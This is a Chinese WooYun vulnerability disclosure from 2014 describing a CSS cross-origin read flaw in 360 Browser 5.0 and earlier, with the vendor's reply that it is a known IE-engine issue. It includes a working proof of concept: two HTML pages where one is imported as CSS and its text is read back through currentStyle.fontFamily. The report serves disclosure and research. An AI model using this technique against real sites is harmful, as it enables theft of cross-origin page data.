360浏览器5.0及以下版本#存在CSS跨域漏洞

漏洞详情

披露状态:

2014-05-18: 细节已通知厂商并且等待厂商处理中
2014-05-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

360浏览器5.0及以下版本#存在CSS跨域漏洞
虽然不是最新版,但也有很多用户在用- -.

详细说明:

360浏览器5.0及以下版本#存在CSS跨域漏洞



下载了360浏览器5.0正式版测试了下- -.

QQ截图20140518224259.png



3.0等等也存在同样的漏洞,我就拿5.0开刀吧- -.

漏洞证明:

构造两个本地的页面:

test.html



<html>
<head>
<title>test</title>
</head>
<body>
{}body{font-family:
WooYun
</body>
</html>



test2.html



<html>
<head>
<title>test2</title>
</head>
<body>
<style>
@import url("C:\Users\Administrator\Desktop\test.html");
</style>
<script>
setTimeout(function(){
var t = document.body.currentStyle.fontFamily;
alert(t);
},2000);
</script>
</body>
</html>





用360浏览器5.0访问下test2.html



QQ截图20140518224823.png







在test2.html 中通过@import加载了 test.html 为CSS文件,渲染进入当前DOM,同时通过 document.body.currentStyle.fontFamily 访问此内容,问题发生在CSS Parse的过程中,将fontFamily后面的内容当做了value,从而读出了test.html的页面内容

修复方案:

补丁:)

版权声明:转载请注明来源 从容@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-05-19 11:01

厂商回复:

您好,此问题是已知的IE内核浏览器漏洞,通过系统打补丁可以解决。360安全浏览器5.0版也已停止更新,我们推荐用户使用7.0版,不受此漏洞影响。感谢您对360安全的关注和支持。

最新状态:

暂无


漏洞评价: